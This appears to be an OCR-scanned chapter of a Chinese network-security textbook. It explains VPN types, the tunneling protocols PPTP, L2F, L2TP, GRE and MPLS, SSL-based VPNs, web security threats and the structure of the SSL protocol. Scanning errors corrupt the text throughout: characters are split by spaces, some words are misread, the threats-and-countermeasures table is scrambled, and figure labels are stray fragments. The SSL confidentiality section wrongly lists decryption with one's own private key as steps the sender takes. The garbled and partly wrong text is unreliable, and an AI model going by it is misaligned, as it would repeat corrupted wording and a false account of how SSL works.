一 群 用 户 专 用 的 通信 和 网络 ,其 虚拟 性 表现 在 任意 一 对 VPN 用 户 之 间 没 有 专用 的 物理 连接 ， 
而 是 通过 ISP 提供 的 公用 网 络 来 实现 通信 的 ,其 专用 性 表现 在 VPN 之 外 的 用 户 无 法 访问 
VPN 内 部 的 网 络 资源 ,VPN 内 部 用 户 之 间 可 以 实现 安全 通信 。 虚 拟 专用 网 可 以 帮助 远程 
用 户 、 公 司 分 支 机 构 .商业 伙伴 及 供应 商 与 公司 的 内 部 网 建立 可 信 的 安全 连接 ,并 保证 数据 
的 安全 传输 。 虚 拟 专 用 网 可 用 于 不 断 增长 的 移动 用 户 的 全 球 因 特 网 接 和 人 ,以 实现 安全 连接 ， 
也 可 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专用 线路 ,还 可 用 于 经 济 有 效 地 连接 到 商业 伙 
伴 和 用 户 的 安全 外 联网 的 虚拟 专用 网 。 

实现 VPN 的 关键 技术 有 下 面 几 种 。 

(1) 隧道 技术 (Tunneling Technology)。 通 过 将 待 传输 的 原始 信息 经 过 加 密 和 协议 封 
装 处 理 后 再 嵌 套 装 和 人 另 一 种 协议 的 数据 包 送 入 网 络 中 , 像 普通 数据 包 一 样 进行 传输 。 经 过 
这 样 的 处 理 , 只 有 源 端 和 目的 端的 用 户 对 隧道 中 的 嵌 套 信息 进行 解释 和 处 理 , 而 对 于 其 他 用 
户 而 言 只 是 无 意义 的 信息 。 这 里 采用 的 是 加 密 和 信息 结构 变换 相 结合 的 方式 ,而 非 单纯 的 
加 密 技术 。 

(2) 加 解密 技术 (Encryption & Decryption)。VPN 可 以 利用 已 有 的 加 解密 技术 实现 
保密 通信 ,保证 公司 业务 和 个 人 通信 的 安全 。 

(3) 密 钥 管理 技术 (Key Management) 。 建 立 隧 道 和 保密 通信 都 需要 密 钥 管理 技术 的 
支撑 , 密 钥 管理 负责 密 钥 的 生成 分 发 .控制 和 跟踪 ,以 及 验证 密 钥 的 真实 性 等 。 

(4) 身份 认证 技术 (Authentication) 。 在 正式 的 隧道 连接 开始 之 前 需要 确认 用 户 的 身 
份 , 以 便 系统 进一步 实施 资源 访问 控制 或 用 户 授权 (Authorization)。 身 份 认证 技术 是 相对 
比较 成 熟 的 一 类 技术 ,因此 可 以 考虑 对 现 有 技术 的 集成 。 

VPN 的 解决 方案 有 以 下 三 种 ,可 以 根据 实际 情况 具体 选择 使 用 。 

(1) 内 联网 VPN(Intranet VPN)。 企 业内 部 虚拟 局 域 网 也 叫 内 联网 VPN ,用 于 实现 企 
业内 部 各 个 LAN 之 间 的 安全 互联 。 越 来 越 多 的 企业 需要 在 全 国 乃 至 世界 范围 内 建立 各 种 
办 事 机 构 、 分 公司 、 研 究 所 等 ,各 个 分 公司 之 间 传 统 的 网 络 联接 方式 一 般 是 租用 专线 。 显 然 ， 
在 分 公司 增多 .业务 开展 越 来 越 广泛 时 ,网 络 结构 趋 于 复杂 ,费用 昂贵 。 利 用 VPN 特性 可 
以 在 Internet 上 组 建 世界 范围 内 的 Intranet VPN。 利 用 Internet 的 线路 可 以 保证 网 络 的 互 
联 性 ,而 利用 隧道 .加密 等 VPN 特性 可 以 保证 信息 在 整个 Intranet VPN 上 安全 传输 。 
Intranet VPN 通过 一 个 使 用 专用 连接 的 共享 基础 设施 ,连接 企业 总 部 .远程 办 事 处 和 分 支 
机 构 。 企 业 拥 有 与 专用 网 络 的 相同 政策 ,包括 安全 .服务 质量 (QoS)、 可 管理 性 和 可 靠 性 。 
Intranet VPN 示意 图 如 图 12-5 所 示 。 
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图 12-5 Intranet VPN 


(2) 外 联网 VPN(Extranet VPN) 。 企 业 外 部 虚拟 专用 网 也 叫 外 联网 VPN ,用 于 实现 
企业 与 客户 、 供 应 商 和 其 他 相关 团体 之 间 的 互联 互通 。 当 然 ,客户 也 可 以 通过 Web 访问 企 
业 的 客户 资源 ,但 是 外 联网 VPN 方式 可 以 方便 地 提供 接 入 控制 和 身份 认证 机 制 ,动态 地 提 
供 公 司 业 务 和 数据 的 访问 权限 。 如 果 公 司 提供 B2B 之 间 的 安全 访问 服务 , 则 可 以 考虑 
Extranet VPN。Extranet VPN 示意 图 如 图 12-6 所 示 。 


图 12-6 Extranet VPN 


(3) 远程 接 入 VPN(Access VPN)。 解 决 远程 用 户 访问 企业 内 部 网 络 的 传统 方法 是 采 
用 长 途 拨 号 方式 接 入 企业 的 网 络 访 问 服务 器 (NAS)。 如 果 企 业 的 内 部 人 员 移 动 或 有 远程 
办 公 需 要 ,或 者 商家 要 提供 B2C 的 安全 访问 服务 ,就 可 以 考虑 使 用 Access VPN。Access 
VPN 通过 一 个 拥有 与 专用 网 络 相 同 策略 的 共享 基础 设施 ,提供 对 企业 内 部 网 或 外 部 网 的 远 
程 访问 。Access VPN 能 使 用 户 随时 、 随 地 以 其 所 需 的 方式 访问 企业 资源 。Access VPN 包 
括 拨号 ISDN 数字 用 户 线路 (xDSL) ,移动 IP 和 电缆 技术 ,能 够 安全 地 连接 移动 用 户 、 远 程 
工作 者 或 分 支 机 构 。Access VPN 示意 图 如 图 12-7 所 示 。Access VPN 最 适用 于 公司 内 部 
经 常 有 流动 人 员 远 程 办 公 的 情况 。 


公司 总 部 用 户 
12-7 Access VPN 


12.2.2 VPN 隧道 技术 


VPN 具体 实现 是 采用 隧道 技术 ,将 企业 网 的 数据 封装 在 隧道 中 进行 传输 。 隧 道 协 议 可 
分 为 第 二 层 隧道 协议 PPTP、L2F、L2TP 和 第 三 层 隧道 协议 GRE、IPSec。 它 们 的 本 质 区 别 
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在 于 用 户 的 数据 包 是 被 封装 在 哪 种 数据 包 中 在 隧道 中 传输 的 。 
1. 第 二 层 隧 道 协议 
无 论 哪 种 隧道 协议 都 是 由 传输 的 载体 .不 同 的 封装 格式 以 及 被 传输 数据 包 组 成 的 。 下 
面 以 第 二 层 隧 道 协 议 (Layer 2 Tunneling Protocol,L2TP) 为 例 , 来 了 解 隧道 协议 的 组 成 。 
如 图 12-8 所 示 ,传输 协议 被 用 来 传送 封装 协议 。IP 是 一 种 常见 的 传输 协议 ,这 是 因为 
IP 具有 强大 的 路 由 选择 能 力 , 可 以 运行 于 不 同 介质 上 ,并 且 其 应 用 最 为 广泛 。 此 外 , 帧 中 
继 .ATM 的 PVC 和 SVC 也 是 非常 合适 的 传输 协议 。 比 如 用 户 想 通过 Internet 将 其 分 公司 
网 络 连接 起 来 ,但 他 的 网 络 环境 是 IPX, 这 时 用 户 就 可 以 使 用 IP 作为 传输 协议 ,通过 封装 协 
议 封装 IPX 的 数据 包 , 然 后 就 可 以 在 Internet 上 传递 IPX 数据 。 封 装 协议 被 用 来 建立 、 保 
持 和 拆 印 隧 道 。 而 承载 协议 是 被 封装 的 协议 ,它们 可 以 是 PPP 或 者 SLIP。 
隧道 协议 有 很 多 好 处 ,例如 在 拨号 网 络 中 ,用 户 大 都 接受 ISP 分 配 的 动态 IP 地 址 ,而 企 
业 网 一 般 均 采用 防火 墙 `NAT 等 安全 措施 来 保护 自己 的 网 络 ,企业 员工 通过 ISP 拨号 上 网 
时 就 不 能 穿 过 防火 墙 访问 企业 内 部 网 资源 。 采 用 隧道 协议 后 ,企业 拨号 用 户 就 可 以 得 到 企 
业内 部 网 IP 地 址 ,通过 对 PPP 帧 进行 封装 ,用 户 数 据 包 可 以 穿 过 防火 墙 到 达 企 业内 部 网 。 
2. 点 对 点 隧道 协议 
PPTP( Point-to-Point Tunneling Protocol) 是 由 Microsoft、Ascend 等 公司 组 成 的 
PPTP 论坛 在 1996 年 定义 的 第 二 层 隧道 协议 。PPTP 提供 PPTP 客户 机 和 PPTP 服务 器 
之 间 的 加 密 通信 。PPTP 客户 机 是 指 运 行 了 该 协议 的 PC,PPTP 服务 器 是 指 运 行 该 协议 的 
服务 器 。PPTP 可 看 做 是 PPP 的 一 种 扩展 。 它 提供 了 一 种 在 Internet 上 建立 多 协议 的 安全 
虚拟 专用 网 (VPN) 的 通信 方式 。 远 端 用 户 能 够 透 过 任何 支持 PPTP 的 ISP 访问 公司 的 专 
用 网 络 。 
通过 PPTP, 客 户 可 采用 拨号 方式 接 入 公共 IP 网 络 Internet。 拨 号 客户 首先 按 常 规 方 
式 拨号 到 ISP 的 接 入 服务 器 (NAS) ,建立 PPP 连接 ; 在 此 基础 上 ,客户 进行 二 次 拨号 建立 
到 PPTP 服务 器 的 连接 ,该 连接 称 为 PPTP 隧道 ,实质 上 是 基于 IP 协议 上 的 另 一 个 PPP 连 
接 , 其 中 的 IP 包 可 以 封装 多 种 协议 数据 ,包括 TCP/IP、IPX 和 NetBEUI。PPTP 采用 了 基 
于 RSA 公司 RC4 的 数据 加 密 方法 ,保证 了 虚拟 连接 通道 的 安全 性 。 对 于 直接 连 到 Internet 
上 的 客户 则 不 需要 第 一 重 PPP 的 拨号 连接 ,可 以 直接 与 PPTP 服务 器 建立 虚拟 通道 。 
PPTP 把 建立 隧道 的 主动 权 交 给 了 用 户 ,但 用 户 需要 在 其 PC 上 配置 PPTP, 这 样 做 既 增 加 
了 用 户 的 工作 量 又 会 造成 网 络 安全 隐患 。 另 外 PPTP 只 支持 IP 作为 传输 协议 。 
3. 第 二 层 转 发 协议 
第 二 层 转发 协议 (Layer 2 Forwarding Protocol,L2F) 是 由 Cisco 公司 提出 的 可 以 在 多 
种 介质 如 ATM、 帧 中 继 、IP 网 上 建立 多 协议 的 安 
ppp A HGW 全 虚拟 专用 网 (VPN) 的 通信 方式 。L2F 隧道 如 
CE 全 图 12-9 所 示 。 远 端 用 户 能 够 透 过 任何 氢 号 方式 
接 和 人 公共 IP 网 络 ,首先 按 常 规 方式 拨号 到 ISP 的 
图 12-9 L2F/L2TP 隧道 接 人 服务 器 (NAS) ,建立 PPP 连接 ; NAS 根据 用 
户 名 等 信息 ,发 起 第 二 重 连接 , 通 向 家 庭 网 关 
HGW 服务 器 。 在 这 种 情况 下 隧道 的 配置 和 建立 对 用 户 是 完全 透明 的 。 


LAC 
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4. 第 二 层 隧道 协议 

L2TP 结合 了 L2F 和 PPTP 的 优点 ,可 以 让 用 户 从 客户 端 或 访问 服务 器 端 发 起 VPN 
连接 。L2TP 是 把 链 路 层 PPP 帧 封装 在 公共 网 络 设 施 如 IP、.ATM 、 帧 中 继 中 进行 隧道 传输 
的 封装 协议 。 

Cisco、Ascend、Microsoft 和 RedBack 公司 的 专家 们 在 修改 了 十 几 个 版 本 后 ,在 1999 年 
8 月 公布 了 L2TP 的 标准 RFC2661。 

目前 用 户 在 拨号 访问 Internet 时 ,必须 使 用 IP 协议 ,并 且 其 动态 得 到 的 IP 地 址 也 是 合 
法 的 。L2TP 的 好 处 就 在 于 支持 多 种 协议 .用户 可 以 保留 原 有 的 IPX、Appletalk 等 协议 或 
公司 原 有 的 IP 地 址 。L2TP 隧道 如 图 12-9 所 示 。L2TP 还 解决 了 多 个 PPP 链 路 的 捆绑 问 
题 ,PPP 链 路 捆绑 要 求 其 成 员 均 指向 同一 个 NAS,L2TP 可 以 使 物理 上 连接 到 不 同 NAS 的 
PPP 链 路 ,在 逻辑 上 的 终结 点 为 同一 个 物理 设备 。L2TP 扩展 了 PPP 连接 ,在 传统 方式 中 
用 户 通 过 模拟 电话 线 或 ISDNVADSL 与 网 络 访问 服务 器 (NAS) 建 立 一 个 第 二 层 的 连接 ,并 
在 其 上 运行 PPP, 第 二 层 连接 的 终结 点 和 PPP 会 话 的 终结 点 在 同一 个 设备 上 (如 NAS)。 
L2TP 作为 PPP 的 扩展 提供 了 更 强大 的 功能 ,包括 第 二 层 连接 的 终结 点 和 PPP 会 话 的 终结 
点 可 以 是 不 同 的 设备 。 

L2TP 主要 由 LAC(L2TP Access Concentrator) 和 LNS(L2TP Network Server) 构 成 ， 
LAC(L2TP 访问 集中 器 ) 支 持 客 户 端的 L2TP, 它 用 于 发 起 呼叫 ,接收 呼叫 和 建立 隧道 ; 
LNS(L2TP 网 络 服 务 器 ) 是 所 有 隧道 的 终点 。 在 传统 的 PPP 连接 中 ,用 户 拨号 连接 的 终点 
是 LAC,L2TP 使 得 PPP 的 终点 延伸 到 LNS。 

L2TP 的 建立 过 程 如 下 。 

(1) 用 户 通过 公共 电话 网 或 ISDN 拨号 至 本 地 的 接 人 服务 器 LAC,LAC 接收 呼叫 并 进 
行 基 本 的 辨别 ,这 一 过 程 可 以 采用 几 种 标准 ,如 域名 、 呼 叫 线路 识别 (CLID) 或 拨号 ID 业务 
(DNIS) 等 。 

(2) 当 用 户 被 确认 为 合法 企业 用 户 时 ,就 建立 一 个 通 向 LNS 的 拨号 VPN 隧道 。 

(3) 企业 内 部 的 安全 服务 器 如 RADIUS 鉴定 拨号 用 户 。 

(4) LNS 与 远程 用 户 交换 PPP 信息 ,分 配 IP 地 址 。LNS 可 采用 企业 专用 地 址 (未 注册 
的 IP 地 址 ) 或 服务 提供 商 提 供 的 地 址 空间 分 配 IP 地 址 。 因 为 内 部 源 IP 地 址 与 目的 地 IP 
地 址 实际 上 都 通过 服务 提供 商 的 IP 网 络 在 PPP 信息 包 内 传送 ,企业 专用 地 址 对 提供 者 的 
网 络 是 透明 的 。 

(5) 端 到 端的 数据 从 拨号 用 户 传 到 LNS。 

在 实际 应 用 中 ,LAC 将 拨号 用 户 的 PPP 帧 封装 后 ,传送 到 LNS,LNS 去 掉 封 装 包头 ,得 
到 PPP 帧 ,再 去 掉 PPP 帧 头 , 得 到 网 络 层 数据 包 。 

L2TP 这 种 方式 给 服务 提供 商 和 用 户 带 来 了 许多 好 处 。 用 户 不 需要 在 PC 上 安装 专门 
的 客户 端 软 件 ,企业 可 以 使 用 未 注册 的 IP 地 址 ,并 在 本 地 管理 认证 数据 库 , 从 而 降低 了 使 用 
成 本 和 培训 维护 费用 。 

与 PPTP 和 L2F 相 比 ,L2TP 的 优点 之 一 是 提供 了 差错 和 流量 控制 ; 另 一 个 优点 是 
L2TP 使 用 UDP 封装 和 传送 PPP 帧 。 面 向 非 连接 的 UDP 无 法 保证 网 络 数 据 的 可 靠 传输 ， 
L2TP 使 用 Nr( 下 一 个 希望 接收 的 消息 序列 号 ) 和 Ns( 当 前 发 送 的 数据 包 序列 号 ) 字 段 控制 
流量 和 差错 。 双 方 通过 序列 号 来 确定 数据 包 的 次 序 和 缓冲 区 ,一 旦 数据 丢失 根据 序列 号 可 
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以 进行 重 发 。 

作为 PPP 的 扩展 ,L2TP 支持 标准 的 安全 特性 CHAP 和 PAP, 可 以 进行 用 户 身份 认 
证 。L2TP 定义 了 控制 包 的 加 密 传输 ,每 个 被 建立 的 隧道 生成 一 个 独一无二 的 随机 密 钥 ,以 
便 抵抗 欺骗 性 的 攻击 ,但 是 它 对 传输 中 的 数据 并 不 加 密 。 

5. 通用 路 由 封装 

通用 路 由 封装 (Generic Routing Encapsulation,GRE) 在 RFC1701/RFC1702 中 定义 ， 
它 规 定 了 怎样 用 一 种 网 络 层 协议 去 封装 另 一 种 网 络 层 协议 的 方法 。GRE 的 隧道 由 两 端的 
源 IP 地 址 和 目的 IP 地 址 来 定义 , 它 人 允许 用 户 使 用 IP 封装 IP、IPX 和 AppleTalk 等 协议 ,并 
支持 全 部 的 路 由 协议 如 RIP、.OSPF、IGRP、EIGRP。 通过 GRE, 用 户 可 以 利用 公共 IP 网 络 
连接 IPX 网 络 、AppleTalk 网 络 ,还 可 以 使 用 保留 地 址 进行 网 络 互联 ,或 者 对 公 网 隐藏 企业 
网 的 IP 地 址 。GRE 只 提供 了 数据 包 的 封装 , 它 并 没有 加 密 功 能 来 防止 网 络 侦 听 和 攻击 。 
所 以 在 实际 环境 中 它 常 和 IPSec 在 一 起 使 用 ,由 IPSec 提供 用 户 数据 的 加 密 , 从 而 给 用 户 提 
供 更 好 的 安全 性 。 

6. 安全 套 接 层 

安全 套 接 层 (Secure Socket Layer,SSL) 是 Netscape 公司 于 1994 年 开发 的 传输 层 安全 
协议 ,目的 是 保护 HTTP, 实 现 Web 安全 通信 。 但 是 这 个 协议 本 身 可 以 保护 任何 一 种 基于 
TCP 的 应 用 。 基 于 SSL 也 可 以 构建 VPN ,因为 SSL 在 Socket 层 上 实施 安全 措施 ,因此 它 
可 以 针对 具体 的 应 用 实施 安全 保护 ,目前 应 用 最 多 的 就 是 利用 SSL 实现 对 Web 应 用 的 
保护 。 

在 应 用 服务 器 前 面 需 要 部 署 一 台 SSL 服务 器 , 它 负 责 接 人 各 个 分 布 的 SSL 客户 端 。 这 
种 应 用 模式 也 是 SSL 主要 的 应 用 模式 ,类 似 于 IPSec VPN 中 的 Access VPN 模式 ,如 果 企 
业 分 布 的 网 络 环境 下 只 有 这 种 基于 C-S 或 B-S 架构 的 应 用 ,不 要 求 各 分 支 机 构 之 间 的 计算 
机 能 够 相互 访问 , 则 可 以 选择 利用 SSL 构建 简单 的 VPN。 具 备 这 种 应 用 模式 的 企业 有 : 证 
券 公司 为 股民 提供 的 网 上 炒股 ,金融 系统 的 网 上 银行 ,中 小 企业 的 ERP 等 。 

基于 SSL 的 VPN 部 署 起 来 非常 简单 ,只 需要 一 台 服 务 器 和 若干 客户 端 软件 。 

7. 多 协议 标签 交换 

多 协议 标签 交换 (Multi Protocol Label Switch,.MPLS) 协 议 设 计 的 目的 是 希望 利用 三 
层 以 太 网 交换 机 一 次 路 由 多 次 转发 的 思想 ,用 来 提高 路 由 器 的 转发 性 能 ,其 基本 的 原理 则 是 
在 报 文中 增加 一 个 TAG 字段 ,在 数据 报 文 经 过 的 路 径 上 的 设备 根据 该 标签 决定 下 一 步 的 
转发 方向 。 这 是 完全 不 同 于 传统 路 由 器 通过 查找 路 由 表 确 定数 据 报 文 下 一 步 转发 方向 的 方 
法 ,路 径 上 的 路 由 转发 设备 需要 运行 LDP 标签 分 发 协议 ,来 相互 通知 对 不 同 TAG 的 处 理 
办 法 。 利 用 MPLS 协议 ,可 以 在 纯粹 的 IP 网 络 上 实现 虚拟 专用 网 络 , 但 是 此 虚拟 专用 网 络 
不 能 保证 用 户 数据 的 安全 性 。 

利用 MPLS 构建 的 VPN 需要 全 网 的 设备 都 支持 MPLS 协议 ,而 IPSec VPN 则 仅 需要 
部 署 在 网 络 边缘 上 的 设备 具备 IPSec 协议 的 支持 即 可 ,从 这 一 点 来 看 ,IPSec VPN 非常 适合 
企业 用 户 在 公共 IP 网 络 上 构建 自己 的 虚拟 专用 网 络 , 而 MPLS 则 只 能 由 运营 商 进 行 统一 
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部 署 。 这 种 建立 VPN 的 方式 有 一 点 利用 IP 网 络 模拟 传统 的 DDN/FR 等 专线 网 络 的 味道 ， 
因为 在 用 户 使 用 MPLS VPN 之 前 ,需要 网 络 运营 者 根据 用 户 的 需求 在 全 局 的 MPLS 网 络 
中 为 用 户 设 定 通道 。MPLS VPN 隧道 划分 的 原理 是 网 络 中 MPLS 路 由 器 利用 数据 包 自身 
携带 的 通道 信息 来 对 数据 进行 转发 ,而 不 再 像 传统 的 路 由 器 那样 要 根据 IP 包 的 地 址 信息 来 
匹配 路 由 表 查 找 转 发 路 径 。 这 种 做 法 可 以 减少 路 由 器 寻 址 的 时 间 ,而 且 能 够 实现 资源 预 留 
保证 VPN 通道 的 服务 质量 。 

MPLS 本 身 不 能 提供 对 数据 的 安全 性 ,MPLS 协议 封装 的 数据 没有 经 过 任何 的 加 密 处 
理 , 仅 仅 是 在 报 文中 增加 一 个 TAG 标识 ,这 个 标识 被 路 由 设备 用 来 进行 数据 链 路 的 识别 和 
对 数据 的 快速 转发 使 用 。 

MPLS 更 适合 运营 商 部 署 ,而 不 适合 企业 用 户 自 己 建 设 ,运营 商 部 署 了 MPLS 网 络 之 
后 ,可 以 向 企业 用 户 提 供 具有 服务 质量 保证 的 网 络 传输 服务 。 但 是 如 果 用 户 希 望 保障 自己 
的 数据 在 网 络 传输 中 的 安全 性 还 是 需要 借助 IPSec VPN 或 者 SSL VPN 来 实现 。 


12.3 Web 安全 


Web 技术 是 Internet 最 具 活力 和 发 展 潜力 的 技术 , 它 广 泛 应 用 于 商业 .教育 和 娱乐 等 
领域 。Internet 中 信息 的 互 连 性 .开放 性 和 交互 性 给 信息 社会 带 来 信息 共享 的 极 大 便利 ,但 
同时 也 带 来 了 严重 的 安全 问题 。Web 是 一 个 运行 于 Internet 和 TCP/IP 内 联网 上 的 客户 - 
服务 器 应 用 程序 ,因此 也 成 为 黑客 攻击 的 主要 对 象 以 及 攻 入 系统 主机 的 主要 通道 之 一 。 
Web 的 安全 性 涉及 整个 Internet 的 安全 , 它 面临 着 许多 新 的 挑战 : Web 具有 双向 的 修改 特 
性 ,Web 服务 器 容易 遭受 来 自 Internet 的 攻击 ; 实现 Web 浏览 .配置 管理 和 内 容 发 布 等 功 
能 的 软件 异常 复杂 ,其 中 通常 隐藏 了 许多 潜在 的 安全 隐患 ， Web 通常 是 一 个 公司 或 机 构 的 
公告 板 , 如 果 Web 服务 器 遭受 破坏 , 则 可 能 损害 公司 或 机 构 的 声誉 , 带 来 经 济 损失 ; 同时 
Web 服务 器 常常 和 其 他 计算 机 系统 联系 在 一 起 ,因此 一 旦 Web 服务 器 被 攻破 ,可 能 歌 及 与 
它 相连 的 其 他 系统 ; Web 用 户 往往 是 未 经 训练 的 ,对 安全 风险 没有 意识 ,更 没有 足够 的 防范 
工具 和 知识 。 


12.3.1 Web 安全 威胁 


目前 ,来 自 Internet 上 的 安全 问题 主要 分 为 两 大 类 : 主动 攻击 和 被 动 攻击 。 主 动 攻击 
是 指 攻击 者 通过 选择 性 地 修改 删除、 延迟 . 乱 序 、 复 制 、 插 入 数据 流 或 数据 流 的 一 部 分 以 达 
到 其 非法 的 目的 。 主 动 攻 击 可 归纳 为 中 断 、 自 改 、 伪 造 三 种 。 被 动 攻 击 主要 是 攻击 者 监听 网 
络 上 传递 的 信息 流 , 从 而 获取 信息 的 内 容 , 或 仅仅 希望 得 到 信息 流 的 长 度 ,传输 频率 等 数据 。 
这 两 种 攻击 方法 是 互补 的 ,也 就 是 说 ,被 动 攻 击 往往 很 难 检测 但 相对 容易 预防 ,而 主动 攻击 
很 难 预防 却 相对 容易 检测 。 表 12-1 给 出 了 Web 安全 威胁 与 对 策 。 

表 12-1 Web 安全 威胁 与 对 策 
数据 特性 威 ” 胁 后 果 对 策 
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完 瘟 性 ”| 生疏 订户 数据 机 器 暴露 加 密 , 校 验 和 
人 易 受到 其 他 危险 的 攻击 
网 上 窃听 
窃取 网 络 配置 信息 风 

保密 性 ”| 从 服务 器 处 窃取 信息 和 加 密 ,Web 代理 
从 客户 端 处 窃取 信息 
窃取 客户 机 与 服务 器 连接 的 信息 
中 断 用 户 连 接 
攻击 DNS 服务 器 让 

拒绝 服务 骚扰 难以 防范 
相生 放 全 人 阻止 用 户 完成 正常 工作 
占 满 硬盘 或 耗 尽 内 存 

ee 数据 伪造 以 假 乱 真 

认证 鉴别 | 冒充 合法 用 户 误 信 错 误 信息 Cb 


12.3.2 Web 安全 的 实现 方法 


实现 Web 安全 的 方法 很 多 ,从 TCP/IP 的 角度 可 以 分 成 三 种 ,分 别 是 网 络 层 安 全 性 、 传 
输 层 安全 性 和 应 用 层 安 全 性 。 

1. 网 络 层 实现 Web 安全 

传统 的 安全 体系 一 般 都 建立 在 应 用 层 上 。 这 些 安全 体系 虽然 具有 一 定 的 可 行 性 ,但 也 
存在 着 巨大 的 安全 隐患 ,因为 IP 包 本 身 不 具备 任何 安全 特性 ,很 容易 被 修改 ,伪造 ,查看 和 重 
播 。IPSec 可 提供 端 到 端的 安全 性 机 制 , 可 在 网 络 层 上 对 数据 包 进 行 安全 处 理 。IPSec 支持 数 
据 加 密 ,同时 确保 资料 的 完整 性 。 各 种 应 用 程序 可 以 享有 IPSec 提供 的 安全 服务 和 密 钥 管理 ， 
而 不 必 设 计 和 实现 自己 的 安全 机 制 , 因 此 减少 了 协商 密 钥 的 开销 ,也 降低 了 产生 安全 漏洞 的 可 
能 性 。IPSec 可 以 在 路 由 器 防火墙. 主机 和 通信 和 链 路 上 配置 ,实现 端 到 端的 安全 虚拟 专用 网 
络 和 安全 隧道 技术 等 。 基 于 网 络 层 使 用 IPSec 来 实现 Web 安全 的 模型 如 图 12-10 所 示 。 

2. 传输 层 实现 Web 安全 

在 TCP 传输 层 之 上 实现 数据 的 安全 传输 是 另 一 种 安全 解决 方案 ,安全 套 接 层 SSL 和 
TLS(Transport Layer Security) 通 常 工作 在 TCP 层 之 上 ,可 以 为 更 高 层 协议 提供 安全 服 
务 。 结 构 如 图 12-11 所 示 。 


HTTP |TELNET| SMTP FTR 


HTTP |TELNET | SMTP FTP SSL 或 TLS 
TCP/UDP TCP 
IP/IPSec IP 


图 12-10 基于 网 络 层 实 现 Web 安全 图 12-11 基于 传输 层 实现 Web 安全 
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3. 应 用 层 实 现 Web 安全 

将 安全 服务 直接 能 入 在 应 用 程序 中 ,从 而 在 应 用 层 实 现 通信 安全 ,如 图 12-12 所 示 。 
SET(Secure Electronic Transaction ,安全 电子 交易 ) 是 一 种 安全 交易 协议 ,SVMIME、PGP 
是 用 于 安全 电子 邮件 的 标准 。 它 们 都 可 以 在 相应 的 应 用 中 提供 机 密 性 、 完 整 性 和 不 可 抵赖 
性 等 安全 服务 。 


S/MINE PGP SET 


Kerberos SMTP HTTP 


UDP TCP 


图 12-12 基于 应 用 层 实现 Web 安全 


12.3.3 SSL 协议 


1. SSL 协议 的 基本 概念 

SSL 协议 被 广泛 用 于 Internet 上 的 安全 传输 、 身 份 认证 等 。 现 行 的 Web 浏览 器 普遍 将 
HTTP 和 SSL 相 结合 ,从 而 实现 Web 服务 器 和 客户 端 浏览 器 之 间 的 安全 通信 。 

SSL 工作 在 TCP 层 之 上 ,可 为 高 层 协议 (如 HTTP、FTP 以 及 Telnet 等 ) 提 供 安 全 服 
务 。SSL 提供 的 安全 服务 采用 了 公 钥 机 制 对 Web 服务 器 和 客户 机 (可 选 ) 的 通信 提供 保密 
性 ,数据 完整 性 和 认证 。 在 建立 连接 过 程 中 采用 非 对 称 密 钥 , 在 会 话 过 程 中 使 用 对 称 密 钥 。 
加 密 的 类 型 和 强度 则 在 两 端 建立 连接 的 过 程 中 协商 决定 。SSL 协议 在 应 用 层 协 议 通 信之 
前 就 已 经 完成 了 加 密 算 法 .通信 密 钥 的 协商 以 及 服务 器 认证 工作 。 在 此 之 后 应 用 层 协议 所 
传送 的 数据 都 会 被 加 密 ,从 而 保证 通信 的 私密 性 。 

SSL 提供 三 种 标准 服务 : 信息 保密 、 数 据 完整 性 和 双向 认证 ,如 表 12-2 所 示 。 

表 12-2 SSL 提供 的 三 种 标准 服务 


安全 服务 主要 技术 作 用 

保密 性 加 密 防止 窃听 

数据 完整 性 数据 认证 编码 防止 破坏 

双向 认证 x. 509 防止 欺骗 
1) 保密 性 


通过 使 用 非 对 称 密 钥 和 对 称 密 钥 技术 达到 数据 保密 。 对 称 密 钥 算法 的 速度 比 非 对 称 密 
钥 算 法 的 速度 快 ,在 SSL 中 利用 了 这 两 种 加 密 算 法 , 既 提 供 了 保密 性 ,又 提高 了 通信 效率 。 

发 送 方 发 送信 息 时 其 步骤 如 下 。 

(1) 产生 一 个 随机 数 , 即 对 称 密 钥 ,接着 用 它 对 发 送 的 明文 信息 进行 加 密 。 

(2) 用 接收 方 的 公开 密 钥 对 随机 数 进行 加 密 。 

(3) 用 自己 的 私 钥 对 随机 数 进行 解密 。 

(4) 再 用 随机 数 对 信息 进行 解密 。 

SSL 服务 器 与 SSL 客户 机 之 间 的 所 有 业务 , 均 使 用 在 握手 过 程 中 建立 的 密 钥 和 算法 进 


第 12 章 JIP 安全 与 Web 安全 343 


行 加 密 , 这 样 ,就 可 以 防止 某 些 用 户 通过 使 用 监听 工具 进行 非法 窃听 了 。 

2) 数据 完整 性 

确保 SSL 业务 全 部 到 达 目 的 地 ,SSL 利用 机 密 共享 和 散 列 函数 组 提供 数据 完整 性 
服务 。 

3) 双向 认证 

客户 机 与 服务 器 相互 识别 ,它们 的 标识 号 用 公开 密 钥 编码 ,并 在 SSL 握手 时 交换 各 自 
的 标识 号 。 最 新 版 本 的 SSL, 除 了 支持 认证 、 可 靠 性 通信 和 完整 性 外 ,还 有 下 面 几 个 特点 。 

(1) 建立 SSL 会 话 的 速度 快 。 

(2) 支持 密 钥 传送 算法 。 

(3) 支持 Fortezza 卡 式 的 硬件 令 牌 。 

(4) 改善 了 证 书 认 证 机 制 ,Server 可 以 定义 可 信 证 书 发 证 机 构 表 。 

2. SSL 协议 的 构成 

SSL 协议 的 目标 就 是 在 通信 双方 利用 加 密 的 SSL 信道 建立 安全 的 连接 。 它 不 是 一 个 
单独 的 协议 ,而 是 两 层 协议 ,结构 如 图 12-13 所 示 。SSL 底层 是 SSL 记录 协议 ,顶层 是 SSL 
握手 协议 .SSL 更 改 密码 规格 协议 和 SSL 警告 协议 。 
SSL 更 改 密码 


L i SSL i HTTP 
SSL 握手 协议 规格 协议 警告 协议 


SSL 记录 协议 
TCP 


IP 


图 12-13 ”SSL 协议 栈 


1) SSL 记录 协议 

SSL 记录 协议 为 SSL 连接 提供 两 种 服务 : 机 密 性 和 报 文 完整 性 。 在 SSL 协议 中 ,所 
有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 长 度 不 为 0 的 记录 数据 组 成 的 。 所 
有 的 SSL 通信 都 使 用 SSL 记录 层 , 记 录 协 议 封装 上 层 的 握手 协议 .警告 协议 改变 密码 格 
式 协议 和 应 用 数据 协议 。SSL 记录 协议 包括 记录 头 和 记录 数据 格式 的 规定 。SSL 记录 协 
议定 义 了 要 传输 数据 的 格式 , 它 位 于 一 些 可 靠 的 传输 协议 之 上 (如 TCP) ,用 于 各 种 更 高 
